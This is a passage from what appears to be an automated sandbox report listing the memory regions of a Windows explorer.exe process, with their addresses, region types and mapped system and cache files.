end_va = 0x2007fff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 1898 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1899 start_va = 0x2020000 end_va = 0x2021fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 1900 start_va = 0x2030000 end_va = 0x2031fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 1901 start_va = 0x2040000 end_va = 0x2041fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 1902 start_va = 0x2050000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1903 start_va = 0x20d0000 end_va = 0x20d2fff entry_point = 0x20d0000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 1904 start_va = 0x20e0000 end_va = 0x20e0fff entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 1905 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 1906 start_va = 0x2100000 end_va = 0x2108fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1907 start_va = 0x2110000 end_va = 0x218ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 1908 start_va = 0x2190000 end_va = 0x226efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 1909 start_va = 0x2270000 end_va = 0x253efff entry_point = 0x2270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1910 start_va = 0x2540000 end_va = 0x2563fff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1911 start_va = 0x2570000 end_va = 0x2577fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 1912 start_va = 0x2580000 end_va = 0x259efff entry_point = 0x2580000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 1913 start_va = 0x25a0000 end_va = 0x25a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 1914 start_va = 0x25b0000 end_va = 0x25b3fff entry_point = 0x25b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1915 start_va = 0x25c0000 end_va = 0x25effff entry_point = 0x25c0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 1916 start_va = 0x25f0000 end_va = 0x25f3fff entry_point = 0x25f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1917 start_va = 0x2600000 end_va = 0x2601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1918 start_va = 0x2610000 end_va = 0x2611fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002610000" filename = "" Region: id = 1919 start_va = 0x2620000 end_va = 0x2623fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1920 start_va = 0x2630000 end_va = 0x2633fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1921 start_va = 0x2640000 end_va = 0x26abfff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1922 start_va = 0x26b0000 end_va = 0x2715fff entry_point = 0x26b0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1923 start_va = 0x2720000 end_va = 0x2721fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1924 start_va = 0x2730000 end_va = 0x2777fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1925 start_va = 0x2780000 end_va = 0x2783fff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 1926 start_va = 0x2790000 end_va = 0x2790fff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1927 start_va = 0x27a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1928 start_va = 0x27b0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1929 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 1930 start_va = 0x29b0000 end_va = 0x29b2fff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1931 start_va = 0x29c0000 end_va = 0x29c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 1932 start_va = 0x29d0000 end_va = 0x29dbfff entry_point = 0x29d0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1933 start_va = 0x29e0000 end_va = 0x29e7fff entry_point = 0x29e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1934 start_va = 0x29f0000 end_va = 0x29fffff entry_point = 0x29f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1935 start_va = 0x2a00000 end_va = 0x2a00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 1936 start_va = 0x2a10000 end_va = 0x2a4ffff entry_point = 0x2a10000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1937 start_va = 0x2a50000 end_va = 0x2a5ffff entry_point = 0x2a50000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017081720170818\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017081720170818\\index.dat") Region: id = 1938 start_va = 0x2a60000 end_va = 0x2a61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a60000" filename = "" Region: id = 1939 start_va = 0x2a70000 end_va = 0x2a74fff entry_point = 0x2a70000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 1940 start_va = 0x2a80000 end_va = 0x2b7ffff entry_point = 0x2a80000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1941 start_va = 0x2b80000 end_va = 0x2b80fff entry_point = 0x2b80000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1942 start_va = 0x2b90000 end_va = 0x2b90fff entry_point = 0x2b90000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1943 start_va = 0x2ba0000 end_va = 0x2ba0fff entry_point = 0x2ba0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1944 start_va = 0x2bb0000 end_va = 0x2ef2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bb0000" filename = "" Region: id = 1945 start_va = 0x2f00000 end_va = 0x2f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f00000" filename = "" Region: id = 1946 start_va = 0x2f10000 end_va = 0x2f11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f10000" filename = "" Region: id = 1947 start_va = 0x2f20000 end_va = 0x2f23fff entry_point = 0x2f20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1948 start_va = 0x2f30000 end_va = 0x2f31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f30000" filename = "" Region: id = 1949 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x2f40000 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 1950 start_va = 0x2f50000 end_va = 0x2f53fff entry_point = 0x2f50000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1951 start_va = 0x2f60000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1952 start_va = 0x2fe0000 end_va = 0x2fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 1953 start_va = 0x2ff0000 end_va = 0x2ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1954 start_va = 0x3000000 end_va = 0x307ffff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1955 start_va = 0x3080000 end_va = 0x3081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003080000" filename = "" Region: id = 1956 start_va = 0x3090000 end_va = 0x3093fff entry_point = 0x3090000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1957 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 1958 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 1959 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030c0000" filename = "" Region: id = 1960 start_va = 0x30d0000 end_va = 0x30d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030d0000" filename = "" Region: id = 1961 start_va = 0x30e0000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 1962 start_va = 0x3160000 end_va = 0x31dffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 1963 start_va = 0x31e0000 end_va = 0x31e0fff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1964 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1965 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1966 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 1967 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 1968 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 1969 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x3240000 region_type = mapped_file name = "{e7a5d490-9662-4cc8-bde6-d78f5ebd0983}.2.ver0x0000000000000003.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E7A5D490-9662-4CC8-BDE6-D78F5EBD0983}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e7a5d490-9662-4cc8-bde6-d78f5ebd0983}.2.ver0x0000000000000003.db") Region: id = 1970 start_va = 0x3250000 end_va = 0x32cffff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 1971 start_va = 0x32d0000 end_va = 0x32e5fff entry_point = 0x32d0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1972 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032f0000" filename = "" Region: id = 1973 start_va = 0x3300000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1974 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 1975 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 1976 start_va = 0x3380000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1977 start_va = 0x3400000 end_va = 0x3d2ffff entry_point = 0x3400000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1978 start_va = 0x3d30000 end_va = 0x3d33fff entry_point = 0x3d30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1979 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x3d40000 region_type = mapped_file name = "{7da9c8ea-8caa-439d-970f-6b573d119577}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{7DA9C8EA-8CAA-439D-970F-6B573D119577}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{7da9c8ea-8caa-439d-970f-6b573d119577}.2.ver0x0000000000000001.db") Region: id = 1980 start_va = 0x3d70000 end_va = 0x3d70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d70000" filename = "" Region: id = 1981 start_va = 0x3d80000 end_va = 0x3dfffff entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 1982 start_va = 0x3e00000 end_va = 0x3e00fff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1983 start_va = 0x3e10000 end_va = 0x3e10fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 1984 start_va = 0x3e20000 end_va = 0x3e20fff entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 1985 start_va = 0x3e30000 end_va = 0x3e30fff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 1986 start_va = 0x3e40000 end_va = 0x3e41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e40000" filename = "" Region: id = 1987 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x3e50000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 1988 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x3e60000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 1989 start_va = 0x3e70000 end_va = 0x3e71fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1990 start_va = 0x3e80000 end_va = 0x3efffff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1991 start_va = 0x3f00000 end_va = 0x3f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1992 start_va = 0x3f50000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 1993 start_va = 0x3fd0000 end_va = 0x3fd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 1994 start_va = 0x3fe0000 end_va = 0x3fe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fe0000" filename = "" Region: id = 1995 start_va = 0x3ff0000 end_va = 0x3ff0fff entry_point = 0x3ff0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1996 start_va = 0x4050000 end_va = 0x4051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004050000" filename = "" Region: id = 1997 start_va = 0x4060000 end_va = 0x4060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004060000" filename = "" Region: id = 1998 start_va = 0x4070000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1999 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040f0000" filename = "" Region: id = 2000 start_va = 0x4100000 end_va = 0x4101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004100000" filename = "" Region: id = 2001 start_va = 0x4110000 end_va = 0x418ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2002 start_va = 0x4210000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 2003 start_va = 0x4410000 end_va = 0x448ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 2004 start_va = 0x4490000 end_va = 0x4490fff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2005 start_va = 0x44a0000 end_va = 0x44a6fff entry_point = 0x44a0000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 2006 start_va = 0x44b0000 end_va = 0x44b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044b0000" filename = "" Region: id = 2007 start_va = 0x44c0000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 2008 start_va = 0x4540000 end_va = 0x4541fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004540000" filename = "" Region: id = 2009 start_va = 0x4550000 end_va = 0x4553fff entry_point = 0x4550000 region_type = mapped_file name = "prnfldr.dll.mui" filename = "\\Windows\\System32\\en-US\\prnfldr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\prnfldr.dll.mui") Region: id = 2010 start_va = 0x4560000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 2011 start_va = 0x4570000 end_va = 0x4580fff entry_point = 0x4570000 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 2012 start_va = 0x4620000 end_va = 0x4620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004620000" filename = "" Region: id = 2013 start_va = 0x4680000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 2014 start_va = 0x4780000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 2015 start_va = 0x4850000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 2016 start_va = 0x48d0000 end_va = 0x4cd2fff entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 2017 start_va = 0x4ce0000 end_va = 0x4d9ffff entry_point = 0x4ce0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2018 start_va = 0x4da0000 end_va = 0x4e9ffff entry_point = 0x4da0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 2019 start_va = 0x4ea0000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 2020 start_va = 0x4f20000 end_va = 0x501ffff entry_point = 0x4f20000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 2021 start_va = 0x5040000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 2022 start_va = 0x5180000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 2023 start_va = 0x5260000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 2024 start_va = 0x5330000 end_va = 0x53affff entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 2025 start_va = 0x53b0000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x00000000053b0000" filename = "" Region: id = 2026 start_va = 0x54d0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000054d0000" filename = "" Region: id = 2027 start_va = 0x5740000 end_va = 0x6a94fff entry_point = 0x5740000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2028 start_va = 0x6aa0000 end_va = 0x6b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006aa0000" filename = "" Region: id = 2029 start_va = 0x6b20000 end_va = 0x6b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b20000" filename = "" Region: id = 2030 start_va = 0x6bb0000 end_va = 0x6c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006bb0000" filename = "" Region: id = 2031 start_va = 0x6c40000 end_va = 0x6c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c40000" filename = "" Region: id = 2032 start_va = 0x6c70000 end_va = 0x6ceffff entry_point = 0x0 region_type = private name = "private_0x0000000006c70000" filename = "" Region: id = 2033 start_va = 0x6dd0000 end_va = 0x6e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 2034 start_va = 0x6eb0000 end_va = 0x6f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006eb0000" filename = "" Region: id = 2035 start_va = 0x6f30000 end_va = 0x6faffff entry_point = 0x0 region_type = private name = "private_0x0000000006f30000" filename = "" Region: id = 2036 start_va = 0x6fb0000 end_va = 0x70affff entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 2037 start_va = 0x70d0000 end_va = 0x714ffff entry_point = 0x0 region_type = private name = "private_0x00000000070d0000" filename = "" Region: id = 2038 start_va = 0x7150000 end_va = 0x71cffff entry_point = 0x0 region_type = private name = "private_0x0000000007150000" filename = "" Region: id = 2039 start_va = 0x73a0000 end_va = 0x779ffff entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 2040 start_va = 0x79a0000 end_va = 0x7c9ffff entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 2041 start_va = 0x73b70000 end_va = 0x73b75fff entry_point = 0x73b70000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 2042 start_va = 0x74e00000 end_va = 0x74ee2fff entry_point = 0x74e00000 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 2043 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fca2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2044 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770c5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2045 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2046 start_va = 0x773a0000 end_va = 0x773a6fff entry_point = 0x773a106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 2047 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2048 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2049 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2050 start_va = 0xff3f0000 end_va = 0xff6affff entry_point = 0xff3f0000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2051 start_va = 0x7fee1c00000 end_va = 0x7fee1d3bfff entry_point = 0x7fee1c00000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 2052 start_va = 0x7fee1d40000 end_va = 0x7fee1e5efff entry_point = 0x7fee1d40000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 2053 start_va = 0x7fef1220000 end_va = 0x7fef125afff entry_point = 0x7fef1221238 